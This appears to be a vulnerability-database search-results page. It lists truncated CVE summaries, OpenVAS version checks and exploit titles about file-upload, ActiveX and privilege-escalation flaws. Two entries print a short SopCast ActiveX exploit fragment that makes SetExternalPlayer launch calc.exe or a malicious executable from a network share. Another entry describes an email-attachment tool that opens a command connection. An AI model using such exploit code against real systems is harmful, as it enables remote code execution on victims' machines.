6692 matches found
Shadow: Privilege escalation
Background: Shadow is a set of tools to deal with user accounts. Description: Paul Szabo reported a race condition in the "login" executable when setting up tty permissions. Impact: A local attacker belonging to the "utmp" group could use symlink attacks to overwrite arbitrary files and possibly gai...
RedHat Update for kernel RHSA-2007:1049-01
Check for the Version of kernel. OpenVAS Vulnerability Test: RedHat Update for kernel RHSA-2007:1049-01. Authors: System Generated Check. Copyright: Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net This program is free software; you can redistribute it and/or modify it under the ter...
Design/Logic Flaw
Insecure method vulnerability in the SopCast SopCore ActiveX control in sopocx.ocx 3.0.3.501 allows remote attackers to execute arbitrary programs via an executable file name in the argument to the SetExternalPlayer method...
CVE-2009-0811
Insecure method vulnerability in the SopCast SopCore ActiveX control in sopocx.ocx 3.0.3.501 allows remote attackers to execute arbitrary programs via an executable file name in the argument to the SetExternalPlayer method...
Sopcast SopCore Control - sopocx.ocx Command Execution
Sopcast SopCore Control - sopocx.ocx Command Execution window.onload=function SopPlayer.InitPlayer; //SopPlayer.SetExternalPlayer"\\192.168.0.1\c$\PATH\TO\MALICIOUSPROGRAM.EXE"; SopPlayer.SetExternalPlayer"c:\WINDOWS\system32\calc.exe";...
Sopcast SopCore Control Command Execution
window.onload=function SopPlayer.InitPlayer; //SopPlayer.SetExternalPlayer"\\192.168.0.1\c$\PATH\TO\MALICIOUSPROGRAM.EXE"; SopPlayer.SetExternalPlayer"c:\WINDOWS\system32\calc.exe"; SopPlayer.SetSopAddress"sop://broker.sopcast.com:3912/6002"; //A LIVE CHANNEL...
Unrestricted file upload
Unrestricted file upload vulnerability in Photos/createalbum.php in Social Groupie allows remote authenticated users to execute arbitrary code by uploading a file with an executable extension, then accessing it via a direct request to the file in Memberimages/...
CVE-2008-6367
Unrestricted file upload vulnerability in Photos/createalbum.php in Social Groupie allows remote authenticated users to execute arbitrary code by uploading a file with an executable extension, then accessing it via a direct request to the file in Memberimages/...
CentOS Update for sblim-cmpi-base CESA-2008:0497 centos4 x86_64
Check for the Version of sblim-cmpi-base. OpenVAS Vulnerability Test: CentOS Update for sblim-cmpi-base CESA-2008:0497 centos4 x86_64. Authors: System Generated Check. Copyright: Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net This program is free software; you can redistribute it...
CentOS Update for kernel CESA-2007:1049 centos3 x86_64
Check for the Version of kernel. OpenVAS Vulnerability Test: CentOS Update for kernel CESA-2007:1049 centos3 x86_64. Authors: System Generated Check. Copyright: Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net This program is free software; you can redistribute it and/or modify it...
CentOS Update for kernel CESA-2007:1049 centos3 i386
Check for the Version of kernel. OpenVAS Vulnerability Test: CentOS Update for kernel CESA-2007:1049 centos3 i386. Authors: System Generated Check. Copyright: Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net This program is free software; you can redistribute it and/or modify it und...
Image upload formula deceptive vulnerability tutorials-vulnerability warning-the black bar safety net
For the reader: the script to attack the lovers, ASP programmer Pre-knowledge: none Image upload formula spoofing attacks Wen/ Yan into the This vulnerability applies to all only check the uploaded file format of the program, put the images into HTML code, after uploading the executable to do the...
Unrestricted file upload
Unrestricted file upload vulnerability in pages/download.php in Iamma Simple Gallery 1.0 and 2.0 allows remote attackers to execute arbitrary PHP code by uploading a file with an executable extension, then accessing it via a direct request to the file in the uploads directory...
E-mail attachment execution
Added: 01/28/2009. Background: This tool sends an e-mail attachment which, when executed, establishes a command connection. Limitations: This tool requires a user to execute the e-mail attachment in order to succeed. This tool requires the IP address of a working mail server which allows relaying of...
Word Viewer OCX 3.2 - Remote Command Execution
Word Viewer OCX 3.2 - Remote Command Execution. Word viewer OCX V 3.2 Remote File execution exploit. By Mountassif Moad a.k.a Stack...
CVE-2008-5677
Unrestricted file upload vulnerability in Kwalbum 2.0.4, 2.0.2, and earlier, when PICSPATH is located in the web root, allows remote authenticated users with upload capability to execute arbitrary code by uploading a file with an executable extension, then accessing it via a direct request to the...
CVE-2008-5663
Multiple unrestricted file upload vulnerabilities in Kusaba 1.0.4 and earlier allow remote authenticated users to execute arbitrary code by uploading a file with an executable extension using (1) loadreceiver.php or (2) a shipainter action to paintsave.php, then accessing the uploaded file via a dire...
Design/Logic Flaw
Incomplete blacklist vulnerability in the Quarantine feature in CoreTypes in Apple Mac OS X 10.5 before 10.5.6 allows user-assisted remote attackers to execute arbitrary code via an executable file with the content type indicating no application association for the file, which does not trigger a...
CVE-2008-4234
Incomplete blacklist vulnerability in the Quarantine feature in CoreTypes in Apple Mac OS X 10.5 before 10.5.6 allows user-assisted remote attackers to execute arbitrary code via an executable file with the content type indicating no application association for the file, which does not trigger a...